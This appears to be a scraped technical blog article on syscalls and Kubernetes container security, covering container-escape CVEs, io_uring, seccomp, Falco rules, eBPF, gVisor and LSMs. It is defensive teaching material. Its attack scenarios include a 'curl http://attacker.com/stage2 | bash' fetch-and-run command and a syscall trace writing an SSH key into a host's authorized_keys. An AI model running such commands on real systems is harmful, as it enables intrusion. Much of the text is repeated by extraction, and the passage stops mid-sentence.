Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what’s happening at this layer. Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what’s happening at this layer. Table of Contents The Problem With “Containers Are Isolated” What Is a Syscall, Really? The io_uring Problem The CPU Privilege Model Anatomy of a Syscall How Containers Change the Equation The Kubernetes Security Stack — Layer by Layer seccomp: Your Syscall Firewall Falco: Syscall-Level Runtime Detection eBPF: Programmable Kernel Hooks gVisor: The User-Space Kernel LSMs: Mandatory Access Controls Real-World Scenarios Performance Implications What a Staff Engineer Should Own Further Reading The Problem With “Containers Are Isolated” What Is a Syscall, Really? The io_uring Problem io_uring The CPU Privilege Model Anatomy of a Syscall How Containers Change the Equation The Kubernetes Security Stack — Layer by Layer seccomp: Your Syscall Firewall Falco: Syscall-Level Runtime Detection eBPF: Programmable Kernel Hooks gVisor: The User-Space Kernel LSMs: Mandatory Access Controls seccomp: Your Syscall Firewall Falco: Syscall-Level Runtime Detection eBPF: Programmable Kernel Hooks gVisor: The User-Space Kernel LSMs: Mandatory Access Controls seccomp: Your Syscall Firewall Falco: Syscall-Level Runtime Detection eBPF: Programmable Kernel Hooks gVisor: The User-Space Kernel LSMs: Mandatory Access Controls Real-World Scenarios Performance Implications What a Staff Engineer Should Own Further Reading The Problem With “Containers Are Isolated” When engineers first learn Kubernetes, they’re told: containers are namespaced processes. And that’s mostly true — namespaces isolate PIDs, mount points, and network interfaces; cgroups constrain CPU and memory. The abstraction holds well enough. containers are namespaced processes Until it doesn’t. In 2019, CVE-2019-5736 exploited a file-descriptor mishandling bug in runc: a container process running as root could open /proc/self/exe, which transparently resolves to the host’s runc binary via procfs semantics — bypassing normal symlink sandboxing. The container could overwrite the runc binary mid-execution and gain host root. In 2022, CVE-2022-0492 found a missing capability check in the kernel’s cgroup_release_agent_write function — a container without CAP_SYS_ADMIN in the host namespace could create a new user namespace via unshare, mount cgroupfs inside it, and write an arbitrary path to release_agent. When the cgroup emptied, the kernel executed that path as root on the host. In 2019, CVE-2019-5736 exploited a file-descriptor mishandling bug in runc: a container process running as root could open /proc/self/exe, which transparently resolves to the host’s runc binary via procfs semantics — bypassing normal symlink sandboxing. The container could overwrite the runc binary mid-execution and gain host root. In 2019, CVE-2019-5736 exploited a file-descriptor mishandling bug in runc: a container process running as root could open /proc/self/exe, which transparently resolves to the host’s runc binary via procfs semantics — bypassing normal symlink sandboxing. The container could overwrite the runc binary mid-execution and gain host root. CVE-2019-5736 runc /proc/self/exe runc procfs runc In 2022, CVE-2022-0492 found a missing capability check in the kernel’s cgroup_release_agent_write function — a container without CAP_SYS_ADMIN in the host namespace could create a new user namespace via unshare, mount cgroupfs inside it, and write an arbitrary path to release_agent. When the cgroup emptied, the kernel executed that path as root on the host. In 2022, CVE-2022-0492 found a missing capability check in the kernel’s cgroup_release_agent_write function — a container without CAP_SYS_ADMIN in the host namespace could create a new user namespace via unshare, mount cgroupfs inside it, and write an arbitrary path to release_agent. When the cgroup emptied, the kernel executed that path as root on the host. CVE-2022-0492 cgroup_release_agent_write CAP_SYS_ADMIN unshare release_agent Both exploits were entirely syscall-driven — no memory corruption required. Crucially, both were blocked by the Docker default seccomp profile and AppArmor — which is precisely why those defaults exist, and why disabling them on production workloads is so dangerous. blocked by the Docker default seccomp profile and AppArmor The root cause in every container escape: containers share the host kernel. And the kernel is reached exclusively through syscalls. containers share the host kernel If you’re a platform or infrastructure engineer running multi-tenant Kubernetes, this isn’t a security team problem. It’s your problem. And it starts with understanding syscalls. What Is a Syscall, Really? Your application — whether it’s written in Go, Python, Java, or Rust — runs in user space. It has no direct access to hardware, the filesystem, or the network. It cannot allocate physical memory. It cannot open a socket. user space To do any of these things, it must ask the kernel — and the only mechanism to do that is a system call (syscall). system call (syscall) Think of it like this: your application is a tenant in an apartment building. The kernel is the building manager who controls access to electricity, water, and the internet. The syscall is the intercom — the only way to request something from the manager. Linux exposes roughly 450 syscalls on x86-64 as of modern 6.x kernels (kernel 5.4 had ~435; kernel 6.1 reached ~450; 6.8+ ~460). The count grows with each release as new interfaces like io_uring and landlock are added. The most commonly used in a typical web application: read, write, open, close, socket, connect, mmap, clone, execve, exit. A typical containerized service uses fewer than 50 distinct syscalls in steady state. 450 syscalls on x86-64 io_uring landlock read write open close socket connect mmap clone execve exit This matters enormously — because the ones you don’t need are your attack surface. don’t The io_uring Problem io_uring Before getting into privilege rings and syscall mechanics, it’s worth calling out the most significant shift in the Linux syscall surface of the past few years: io_uring. io_uring Introduced in Linux 5.1 (2019), io_uring is an asynchronous I/O interface built around two ring buffers shared between user space and the kernel. The design goal was to eliminate the per-operation syscall overhead that makes high-throughput I/O expensive under KPTI(Kernel Page-Table Isolation). Instead of calling read() or write() per operation, applications submit batches of I/O requests by writing into the submission queue (SQ ring) and poll the completion queue (CQ ring) for results — all without a syscall per operation. io_uring read() write() The performance gains are real — io_uring can drive storage and network I/O at significantly higher throughput than traditional syscall-per-operation patterns. But it introduced a massive new kernel attack surface. io_uring The Security Problem io_uring operations execute in the kernel with elevated context. Because the interface is complex, stateful, and relatively new, it has been a prolific source of privilege escalation vulnerabilities: io_uring CVE Year Impact CVE-2021-41073 2021 Type confusion in io_uring leading to privilege escalation CVE-2022-29582 2022 Use-after-free in io_uring — container escape CVE-2023-2598 2023 Heap out-of-bounds write via io_uring fixed buffers CVE Year Impact CVE-2021-41073 2021 Type confusion in io_uring leading to privilege escalation CVE-2022-29582 2022 Use-after-free in io_uring — container escape CVE-2023-2598 2023 Heap out-of-bounds write via io_uring fixed buffers CVE Year Impact CVE CVE Year Year Impact Impact CVE-2021-41073 2021 Type confusion in io_uring leading to privilege escalation CVE-2021-41073 CVE-2021-41073 2021 2021 Type confusion in io_uring leading to privilege escalation Type confusion in io_uring leading to privilege escalation io_uring CVE-2022-29582 2022 Use-after-free in io_uring — container escape CVE-2022-29582 CVE-2022-29582 2022 2022 Use-after-free in io_uring — container escape Use-after-free in io_uring — container escape io_uring CVE-2023-2598 2023 Heap out-of-bounds write via io_uring fixed buffers CVE-2023-2598 CVE-2023-2598 2023 2023 Heap out-of-bounds write via io_uring fixed buffers Heap out-of-bounds write via io_uring fixed buffers io_uring Each of these was reachable from an unprivileged container process. Because io_uring isn’t a single syscall but a kernel subsystem accessed via three syscalls (io_uring_setup, io_uring_enter, io_uring_register), the standard seccomp RuntimeDefault profile does not block it — it was introduced after the default profiles were designed. io_uring kernel subsystem io_uring_setup io_uring_enter io_uring_register RuntimeDefault not What To Do Many hardened environments explicitly block io_uring at the seccomp level: io_uring { "syscalls": [ { "names": ["io_uring_setup", "io_uring_enter", "io_uring_register"], "action": "SCMP_ACT_ERRNO" } ] } { "syscalls": [ { "names": ["io_uring_setup", "io_uring_enter", "io_uring_register"], "action": "SCMP_ACT_ERRNO" } ] } Google’s own gVisor disables io_uring by default. The Kubernetes v1.33 audit trail and several CIS benchmarks now explicitly recommend blocking io_uring for workloads that don’t require it. Google’s own gVisor io_uring v1.33 io_uring The staff-level takeaway: every time the kernel adds a new high-performance I/O interface, it adds a new attack surface that existing seccomp profiles don’t cover. io_uring is the canonical example. Your seccomp profile graduation pipeline must account for new kernel subsystems, not just new individual syscalls. The staff-level takeaway: io_uring The CPU Privilege Model To understand why syscalls exist, you need to understand how CPUs enforce privilege boundaries. Modern x86-64 processors have four privilege rings: four privilege rings Linux only uses Ring 0 (kernel) and Ring 3 (user). When your application executes the syscall instruction, the CPU immediately: syscall Saves the current register state Switches to kernel mode (Ring 0) Jumps to the kernel’s syscall handler Executes the requested operation Restores registers and returns to Ring 3 Saves the current register state Switches to kernel mode (Ring 0) Jumps to the kernel’s syscall handler Executes the requested operation Restores registers and returns to Ring 3 This mode switch is the only sanctioned transition. Without it, user-space code cannot touch kernel data structures, physical memory, or hardware. It’s a hardware-enforced boundary — not a software convention. only The critical insight for container security: this boundary is per-kernel, not per-container. When two containers run on the same node, they use the same syscall gateway into the same kernel. A syscall that bypasses a kernel check escapes both containers simultaneously. The critical insight for container security: Anatomy of a Syscall Let’s trace a concrete example. Suppose a Go HTTP server accepts a connection and reads the request body. What looks like a single conn.Read() call results in: conn.Read() One or more read(2) syscalls on the socket file descriptor The kernel checking the process’s permissions, the socket state, and available data A DMA transfer from the NIC’s ring buffer into kernel memory, then copied to user space One or more read(2) syscalls on the socket file descriptor read(2) The kernel checking the process’s permissions, the socket state, and available data A DMA transfer from the NIC’s ring buffer into kernel memory, then copied to user space Every one of those kernel checks is a potential security enforcement point — and every kernel bug in that path is a potential vulnerability reachable from your container. How Containers Change the Equation A VM gives each workload its own kernel. A container does not. Containers get: PID namespace — isolated process tree Network namespace — isolated network stack Mount namespace — isolated filesystem view cgroups — CPU/memory resource limits PID namespace — isolated process tree PID namespace Network namespace — isolated network stack Network namespace Mount namespace — isolated filesystem view Mount namespace cgroups — CPU/memory resource limits cgroups Containers do not get: not Their own kernel Their own syscall table Kernel memory isolation Their own kernel Their own syscall table Kernel memory isolation This does not mean containers have zero isolation. Multiple mechanisms reduce the blast radius of a kernel compromise: not Namespaces — restrict what a container can see (PIDs, mounts, network) cgroups — bound resource consumption Linux Capabilities — limit the privilege set a container process holds seccomp — restrict which syscalls can be made at all LSMs (AppArmor/SELinux) — enforce mandatory access controls even on permitted syscalls Namespaces — restrict what a container can see (PIDs, mounts, network) Namespaces cgroups — bound resource consumption cgroups Linux Capabilities — limit the privilege set a container process holds Linux Capabilities seccomp — restrict which syscalls can be made at all seccomp LSMs (AppArmor/SELinux) — enforce mandatory access controls even on permitted syscalls LSMs (AppArmor/SELinux) These work as defence-in-depth layers, not as kernel isolation equivalents. A VM still provides a fundamentally stronger boundary because kernel bugs in one tenant cannot affect another tenant’s kernel. But a well-configured container is far harder to escape than a bare process. defence-in-depth layers This means if Container A can trigger a kernel bug via a syscall — say, a privilege escalation in clone() or a heap overflow in io_uring — it affects the host and every other container on that node. clone() io_uring Real scenario: In 2022, CVE-2022-0492 found a missing capability check in the kernel’s cgroup_release_agent_write function. The kernel failed to verify that the calling process held CAP_SYS_ADMIN in the initial user namespace. A container process could call unshare() to create a new user namespace and cgroup namespace, mount cgroupfs inside it, then write an arbitrary host binary path to release_agent — all without elevated host privileges. When the cgroup became empty, the kernel executed that binary as root on the host. Zero memory corruption: just unshare(), mount(), and write() syscalls in the right sequence. Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable — those layers blocked the required mount() and unshare() calls. Only permissive configurations (no seccomp, no MAC) were at risk. Real scenario: cgroup_release_agent_write CAP_SYS_ADMIN initial unshare() release_agent unshare() mount() write() Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable mount() unshare() The Kubernetes Security Stack — Layer by Layer Given that containers share a kernel, how do you defend the syscall boundary? There are five complementary mechanisms — each operating at a different point in the syscall path: seccomp: Your Syscall Firewall seccomp (Secure Computing Mode) is a Linux kernel feature that lets you attach a BPF filter to a process. The filter is evaluated on every syscall before the kernel executes it. When a syscall is not allowed, the filter’s configured action determines the outcome — it is not always a simple EPERM: seccomp before EPERM seccomp Action Behaviour SCMP_ACT_ALLOW Syscall proceeds normally SCMP_ACT_ERRNO Returns an error code (e.g. EPERM) — the default for RuntimeDefault SCMP_ACT_KILL_PROCESS Immediately kills the process — used for highest-risk syscalls SCMP_ACT_LOG Logs the syscall, allows it — useful for audit-mode profiling SCMP_ACT_TRACE Notifies a ptrace tracer — used for policy development tooling SCMP_ACT_NOTIFY Sends the event to a user-space supervisor via fd — enables policy agents seccomp Action Behaviour SCMP_ACT_ALLOW Syscall proceeds normally SCMP_ACT_ERRNO Returns an error code (e.g. EPERM) — the default for RuntimeDefault SCMP_ACT_KILL_PROCESS Immediately kills the process — used for highest-risk syscalls SCMP_ACT_LOG Logs the syscall, allows it — useful for audit-mode profiling SCMP_ACT_TRACE Notifies a ptrace tracer — used for policy development tooling SCMP_ACT_NOTIFY Sends the event to a user-space supervisor via fd — enables policy agents seccomp Action Behaviour seccomp Action seccomp Action Behaviour Behaviour SCMP_ACT_ALLOW Syscall proceeds normally SCMP_ACT_ALLOW SCMP_ACT_ALLOW SCMP_ACT_ALLOW Syscall proceeds normally Syscall proceeds normally SCMP_ACT_ERRNO Returns an error code (e.g. EPERM) — the default for RuntimeDefault SCMP_ACT_ERRNO SCMP_ACT_ERRNO SCMP_ACT_ERRNO Returns an error code (e.g. EPERM) — the default for RuntimeDefault Returns an error code (e.g. EPERM) — the default for RuntimeDefault EPERM SCMP_ACT_KILL_PROCESS Immediately kills the process — used for highest-risk syscalls SCMP_ACT_KILL_PROCESS SCMP_ACT_KILL_PROCESS SCMP_ACT_KILL_PROCESS Immediately kills the process — used for highest-risk syscalls Immediately kills the process — used for highest-risk syscalls SCMP_ACT_LOG Logs the syscall, allows it — useful for audit-mode profiling SCMP_ACT_LOG SCMP_ACT_LOG SCMP_ACT_LOG Logs the syscall, allows it — useful for audit-mode profiling Logs the syscall, allows it — useful for audit-mode profiling SCMP_ACT_TRACE Notifies a ptrace tracer — used for policy development tooling SCMP_ACT_TRACE SCMP_ACT_TRACE SCMP_ACT_TRACE Notifies a ptrace tracer — used for policy development tooling Notifies a ptrace tracer — used for policy development tooling ptrace SCMP_ACT_NOTIFY Sends the event to a user-space supervisor via fd — enables policy agents SCMP_ACT_NOTIFY SCMP_ACT_NOTIFY SCMP_ACT_NOTIFY Sends the event to a user-space supervisor via fd — enables policy agents Sends the event to a user-space supervisor via fd — enables policy agents The Kubernetes RuntimeDefault profile uses SCMP_ACT_ERRNO for disallowed syscalls. Custom profiles can mix actions — kill on ptrace, log on unknown syscalls during a grace period, and allow everything else. RuntimeDefault SCMP_ACT_ERRNO ptrace Analogy: seccomp is a bouncer at the kernel’s door. Your app can only get in if the syscall is on the guest list. Analogy: Kubernetes exposes this via seccompProfile: seccompProfile apiVersion: v1 kind: Pod spec: securityContext: seccompProfile: type: RuntimeDefault # containerd/docker's default profile containers: - name: api-server image: myapp:latest securityContext: allowPrivilegeEscalation: false apiVersion: v1 kind: Pod spec: securityContext: seccompProfile: type: RuntimeDefault # containerd/docker's default profile containers: - name: api-server image: myapp:latest securityContext: allowPrivilegeEscalation: false The RuntimeDefault profile blocks ~44 high-risk syscalls including: RuntimeDefault Syscall Why it's dangerous ptrace Allows one process to inspect/modify another's memory. Classic injection vector. clone (namespace-creating flags only) The profile blocks CLONE_NEWUSER and CLONE_NEWNS flag combinations — not clone itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector. syslog Reads kernel message buffer. Information disclosure. perf_event_open Side-channel attack surface (Spectre-class). keyctl Access to kernel keyring. Credential theft. bpf Load eBPF programs. Privilege escalation surface. Syscall Why it's dangerous ptrace Allows one process to inspect/modify another's memory. Classic injection vector. clone (namespace-creating flags only) The profile blocks CLONE_NEWUSER and CLONE_NEWNS flag combinations — not clone itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector. syslog Reads kernel message buffer. Information disclosure. perf_event_open Side-channel attack surface (Spectre-class). keyctl Access to kernel keyring. Credential theft. bpf Load eBPF programs. Privilege escalation surface. Syscall Why it's dangerous Syscall Syscall Why it's dangerous Why it's dangerous ptrace Allows one process to inspect/modify another's memory. Classic injection vector. ptrace ptrace ptrace Allows one process to inspect/modify another's memory. Classic injection vector. Allows one process to inspect/modify another's memory. Classic injection vector. clone (namespace-creating flags only) The profile blocks CLONE_NEWUSER and CLONE_NEWNS flag combinations — not clone itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector. clone (namespace-creating flags only) clone (namespace-creating flags only) clone The profile blocks CLONE_NEWUSER and CLONE_NEWNS flag combinations — not clone itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector. The profile blocks CLONE_NEWUSER and CLONE_NEWNS flag combinations — not clone itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector. CLONE_NEWUSER CLONE_NEWNS clone syslog Reads kernel message buffer. Information disclosure. syslog syslog syslog Reads kernel message buffer. Information disclosure. Reads kernel message buffer. Information disclosure. perf_event_open Side-channel attack surface (Spectre-class). perf_event_open perf_event_open perf_event_open Side-channel attack surface (Spectre-class). Side-channel attack surface (Spectre-class). keyctl Access to kernel keyring. Credential theft. keyctl keyctl keyctl Access to kernel keyring. Credential theft. Access to kernel keyring. Credential theft. bpf Load eBPF programs. Privilege escalation surface. bpf bpf bpf Load eBPF programs. Privilege escalation surface. Load eBPF programs. Privilege escalation surface. For high-security workloads, RuntimeDefault isn’t enough. You want a custom profile scoped to what your specific workload actually calls. Here’s the workflow: For high-security workloads, RuntimeDefault Production tip: Start with RuntimeDefault, instrument with Falco to catch EPERM signals, then tighten to a custom profile over one or two release cycles. Don’t try to go from zero to custom profile in one shot — you’ll break things. Production tip: RuntimeDefault Falco: Syscall-Level Runtime Detection Falco (CNCF project) hooks into the kernel’s syscall stream — via a kernel module or an eBPF probe — and evaluates every syscall event against a rule engine in user space. Falco Falco rules are expressive and context-aware: - rule: Shell Spawned in Container desc: A shell was spawned in a container that should not run shells condition: > spawned_process and container and shell_procs and not proc.pname in (allowed_parents) output: > Shell spawned in container (pod=%k8s.pod.name ns=%k8s.ns.name cmd=%proc.cmdline parent=%proc.pname image=%container.image.repository) priority: CRITICAL - rule: Shell Spawned in Container desc: A shell was spawned in a container that should not run shells condition: > spawned_process and container and shell_procs and not proc.pname in (allowed_parents) output: > Shell spawned in container (pod=%k8s.pod.name ns=%k8s.ns.name cmd=%proc.cmdline parent=%proc.pname image=%container.image.repository) priority: CRITICAL Why Falco catches what application-level monitoring misses: Why Falco catches what application-level monitoring misses: All behavior — no matter how sophisticated — eventually becomes syscalls. An attacker who compromises your app and tries to: Read /etc/shadow → openat() syscall → Falco sees it Exfiltrate data via DNS → socket() + connect() → Falco sees it Escalate privileges → setuid() / clone() → Falco sees it Download a second-stage payload → execve("curl", ...) → Falco sees it Read /etc/shadow → openat() syscall → Falco sees it /etc/shadow openat() Exfiltrate data via DNS → socket() + connect() → Falco sees it socket() connect() Escalate privileges → setuid() / clone() → Falco sees it setuid() clone() Download a second-stage payload → execve("curl", ...) → Falco sees it execve("curl", ...) No agent in your application code. No SDK to integrate. Pure kernel-level observation. Staff-level consideration: Falco’s event throughput on a busy node can be high — 100k+ syscall events/sec on a heavily loaded API server node. You need to think about the Falco deployment model (DaemonSet with kernel module vs. eBPF probe), rule cardinality, and alert fatigue suppression from the start. Falco’s modern eBPF probe requires kernel ≥5.8 (for BPF ring buffer and BTF/CO-RE support) and has been the default driver since Falco 0.38.0 — it is bundled directly in the Falco binary, requiring no separate kernel module compilation. In Falco 0.43.0, the legacy eBPF probe (engine.kind=ebpf) was deprecated (not the kernel module — kmod remains supported for older kernels). The driver decision tree in production: kernel ≥5.8 → modern eBPF (default, zero driver download); kernel <5.8 → kernel module (kmod), which requires matching kernel headers and breaks on kernel upgrades. Staff-level consideration: modern eBPF probe default legacy eBPF probe engine.kind=ebpf kmod kmod eBPF: Programmable Kernel Hooks eBPF (extended Berkeley Packet Filter) is one of the most significant additions to the Linux kernel in the last decade. It lets you load sandboxed programs into the kernel that execute at specific hook points — including syscall entry and exit — without modifying kernel source or loading full kernel modules. eBPF The verifier is the key safety property: before any eBPF program executes in the kernel, the verifier statically proves it terminates, doesn’t access invalid memory, and can’t crash the kernel. This gives you programmable kernel instrumentation without the risk of a buggy kernel module taking down the node. How Kubernetes tooling uses eBPF: How Kubernetes tooling uses eBPF: Tool eBPF Hook What it achieves Cilium tc, xdp, socket hooks L3/L4/L7 network policy without iptables Tetragon kprobe, tracepoint Enforce policy at kernel function level (not just syscall boundary) Pixie uprobe + syscall hooks Capture HTTP headers, SQL queries, gRPC frames without app changes Parca perf_event Continuous CPU profiling with stack traces Falco Tracepoint / raw syscall Runtime security event stream Tool eBPF Hook What it achieves Cilium tc, xdp, socket hooks L3/L4/L7 network policy without iptables Tetragon kprobe, tracepoint Enforce policy at kernel function level (not just syscall boundary) Pixie uprobe + syscall hooks Capture HTTP headers, SQL queries, gRPC frames without app changes Parca perf_event Continuous CPU profiling with stack traces Falco Tracepoint / raw syscall Runtime security event stream Tool eBPF Hook What it achieves Tool Tool eBPF Hook eBPF Hook What it achieves What it achieves Cilium tc, xdp, socket hooks L3/L4/L7 network policy without iptables Cilium Cilium Cilium Cilium tc, xdp, socket hooks tc, xdp, socket hooks tc xdp L3/L4/L7 network policy without iptables L3/L4/L7 network policy without iptables Tetragon kprobe, tracepoint Enforce policy at kernel function level (not just syscall boundary) Tetragon Tetragon Tetragon Tetragon kprobe, tracepoint kprobe, tracepoint kprobe tracepoint Enforce policy at kernel function level (not just syscall boundary) Enforce policy at kernel function level (not just syscall boundary) Pixie uprobe + syscall hooks Capture HTTP headers, SQL queries, gRPC frames without app changes Pixie Pixie Pixie Pixie uprobe + syscall hooks uprobe + syscall hooks uprobe Capture HTTP headers, SQL queries, gRPC frames without app changes Capture HTTP headers, SQL queries, gRPC frames without app changes Parca perf_event Continuous CPU profiling with stack traces Parca Parca Parca Parca perf_event perf_event perf_event Continuous CPU profiling with stack traces Continuous CPU profiling with stack traces Falco Tracepoint / raw syscall Runtime security event stream Falco Falco Falco Falco Tracepoint / raw syscall Tracepoint / raw syscall Runtime security event stream Runtime security event stream Staff-level insight: The shift from iptables/ipvs to eBPF-based networking (Cilium) is not just a performance improvement. It’s a security architecture change. With iptables, policy is evaluated at netfilter hooks — after the syscall has returned and the packet is already in the kernel’s network stack. With eBPF XDP(eXpress Data Path), you can drop packets before they even DMA(Direct Memory Access) into kernel memory. The enforcement point moves earlier in the execution path. Staff-level insight: XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack. DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention. XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack. DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention. gVisor: The User-Space Kernel gVisor takes a fundamentally different approach: instead of filtering which syscalls your container can make, it intercepts all syscalls and handles them in a user-space kernel called the Sentry. gVisor all Sentry The Sentry is written in Go and implements the Linux syscall ABI(Application Binary Interface). When your container app calls open(), the Sentry handles it — checking permissions, managing file descriptors — using only a narrow set of host syscalls to do so. The host kernel’s attack surface shrinks from ~450 syscalls to a few dozen host syscalls. Per gVisor’s own security documentation, this is in the range of 53–68 depending on whether networking (Netstack) is enabled — but this figure varies by platform and gVisor version. The key invariant: no syscall is ever passed through directly. Each one has an independent implementation inside the Sentry, so even if the Sentry’s syscall handling has a bug, the host kernel’s full attack surface is never exposed. open() a few dozen no syscall is ever passed through directly Where this is deployed: Google Cloud Run and GKE Sandbox use gVisor. If you run untrusted code (user-submitted functions, multi-tenant FaaS), gVisor is the right choice. For trusted first-party workloads, the overhead (10-15% latency increase on I/O-heavy workloads) may not be justified. Where this is deployed: The tradeoff is explicit: The tradeoff is explicit: Attack surface reduction = performance cost More isolation = more overhead Attack surface reduction = performance cost More isolation = more overhead seccomp + eBPF gets you 80% of the protection at ~1% overhead. gVisor gets you 99% protection at 10-15% overhead. Choose based on your threat model. LSMs: Mandatory Access Controls seccomp decides which syscalls a process can make. Linux Security Modules (LSMs) decide what those syscalls can do — even after they’ve been permitted. which syscalls Linux Security Modules (LSMs) what those syscalls can do The distinction matters. A container’s seccomp profile might allow openat() (it’s fundamental to almost every workload). An LSM then enforces which paths that openat() can access. The syscall passes seccomp; the kernel’s LSM hook fires before the file is opened; access is denied. openat() which paths openat() Three LSMs are relevant in Kubernetes: LSM Mechanism Kubernetes Usage AppArmor Path-based profiles — restrict file access, network, capabilities per process Default on Ubuntu/Debian nodes; containerd applies profiles per container SELinux Label-based mandatory access control — every process and file has a security context Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods Landlock Unprivileged sandboxing — processes can voluntarily restrict their own file access Emerging; available since kernel 5.13; useful for defence-in-depth in application code LSM Mechanism Kubernetes Usage AppArmor Path-based profiles — restrict file access, network, capabilities per process Default on Ubuntu/Debian nodes; containerd applies profiles per container SELinux Label-based mandatory access control — every process and file has a security context Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods Landlock Unprivileged sandboxing — processes can voluntarily restrict their own file access Emerging; available since kernel 5.13; useful for defence-in-depth in application code LSM Mechanism Kubernetes Usage LSM LSM Mechanism Mechanism Kubernetes Usage Kubernetes Usage AppArmor Path-based profiles — restrict file access, network, capabilities per process Default on Ubuntu/Debian nodes; containerd applies profiles per container AppArmor AppArmor AppArmor AppArmor Path-based profiles — restrict file access, network, capabilities per process Path-based profiles — restrict file access, network, capabilities per process Default on Ubuntu/Debian nodes; containerd applies profiles per container Default on Ubuntu/Debian nodes; containerd applies profiles per container SELinux Label-based mandatory access control — every process and file has a security context Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods SELinux SELinux SELinux SELinux Label-based mandatory access control — every process and file has a security context Label-based mandatory access control — every process and file has a security context Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods Landlock Unprivileged sandboxing — processes can voluntarily restrict their own file access Emerging; available since kernel 5.13; useful for defence-in-depth in application code Landlock Landlock Landlock Landlock Unprivileged sandboxing — processes can voluntarily restrict their own file access Unprivileged sandboxing — processes can voluntarily restrict their own file access Emerging; available since kernel 5.13; useful for defence-in-depth in application code Emerging; available since kernel 5.13; useful for defence-in-depth in application code Why this matters for CVE-2022-0492: That exploit required unshare() and mount() syscalls. seccomp’s RuntimeDefault profile blocked them. But if you’d been running without seccomp, AppArmor’s default container profile would have independently denied the mount operation. This is defence-in-depth working as intended — two independent layers, either of which alone would have stopped the exploit. Why this matters for CVE-2022-0492: unshare() mount() RuntimeDefault mount Staff-level note: AppArmor and SELinux profiles are often set to Unconfined in practice because they’re hard to operationalise at scale. This is the real risk — not that the tools don’t work, but that they’re disabled. A platform team should treat LSM profile coverage as a first-class metric alongside seccomp adoption. Staff-level note: Unconfined Real-World Scenarios Scenario 1: The Cryptominer Escape What happened: An attacker compromised a poorly-configured Redis instance in a container (no auth, exposed port). They: What happened: Used Redis’s CONFIG SET dir and CONFIG SET dbfilename to write an SSH public key to /root/.ssh/authorized_keys on the host — possible because the container ran as root and the host /root was mounted in. SSHd into the host directly. Used Redis’s CONFIG SET dir and CONFIG SET dbfilename to write an SSH public key to /root/.ssh/authorized_keys on the host — possible because the container ran as root and the host /root was mounted in. CONFIG SET dir CONFIG SET dbfilename /root/.ssh/authorized_keys /root SSHd into the host directly. Syscall trace of the attack: Syscall trace of the attack: openat(AT_FDCWD, "/mnt/host-root/.ssh/authorized_keys", O_WRONLY|O_CREAT) write(fd, "ssh-rsa AAAA...", ...) openat(AT_FDCWD, "/mnt/host-root/.ssh/authorized_keys", O_WRONLY|O_CREAT) write(fd, "ssh-rsa AAAA...", ...) What would have caught it: What would have caught it: seccomp: A custom profile would not have blocked openat (it’s fundamental), but mounting host paths is a Kubernetes admission controller concern. Falco rule: openat to a path outside the container’s expected directories → alert. Root cause fix: Don’t run containers as root. Use runAsNonRoot: true. Don’t mount host paths. seccomp: A custom profile would not have blocked openat (it’s fundamental), but mounting host paths is a Kubernetes admission controller concern. seccomp: openat Falco rule: openat to a path outside the container’s expected directories → alert. Falco rule: openat Root cause fix: Don’t run containers as root. Use runAsNonRoot: true. Don’t mount host paths. Root cause fix: runAsNonRoot: true Scenario 2: The Lateral Movement via execve execve What happened: An attacker found an RCE in a Java app. The exploit triggered Runtime.exec("curl http://attacker.com/stage2 | bash"). What happened: Runtime.exec("curl http://attacker.com/stage2 | bash") Syscall sequence: Syscall sequence: clone() → fork a child process execve("bash") → replace child with bash execve("curl") → curl downloads payload execve("bash") → execute payload clone() → fork a child process execve("bash") → replace child with bash execve("curl") → curl downloads payload execve("bash") → execute payload What Falco catches immediately: What Falco catches immediately: A Java process (java) spawning bash → anomalous parent-child relationship curl executing from within a container that has no business running curl execve of any shell from a non-shell expected workload A Java process (java) spawning bash → anomalous parent-child relationship java bash curl executing from within a container that has no business running curl curl curl execve of any shell from a non-shell expected workload execve What seccomp can do: If your Java service has a custom seccomp profile that doesn’t include execve at all (many services never need to fork/exec), the clone() + execve() chain is blocked before it starts. What seccomp can do: execve clone() execve() Scenario 3: eBPF-Based Zero-Trust Networking Setup: You’re migrating from an iptables-based CNI to Cilium. The goal is L7-aware network policy. Setup: Without eBPF, enforcing “Pod A can call /api/users on Pod B but not /api/admin” requires an L7 proxy sidecar (Istio/Envoy). Every request goes: /api/users /api/admin App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App That’s four kernel crossings per request. With Cilium’s eBPF-based L7 policy: App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App Two kernel crossings for L3/L4 policy. For L7 (HTTP method/path inspection), Cilium uses a per-node Envoy proxy — not a per-pod sidecar — which is redirected to via eBPF socket hooks. This eliminates the per-pod sidecar overhead while still enabling L7 enforcement. The key distinction: L3/L4 enforcement is entirely in eBPF (zero user-space hops); L7 enforcement redirects through a shared node-level proxy rather than duplicating a proxy instance per pod. shared The syscall angle: eBPF programs attach to sock_ops and sk_msg hooks — fired at socket-level syscall boundaries. Before a TCP connection is fully established or a stream is forwarded, the eBPF program has already made the L3/L4 allow/deny decision, with L7 decisions delegated to the node Envoy. sock_ops sk_msg Performance Implications Every syscall has a cost. The mode switch from Ring 3 (user mode) to Ring 0 (kernel mode) takes 100–300 nanoseconds on 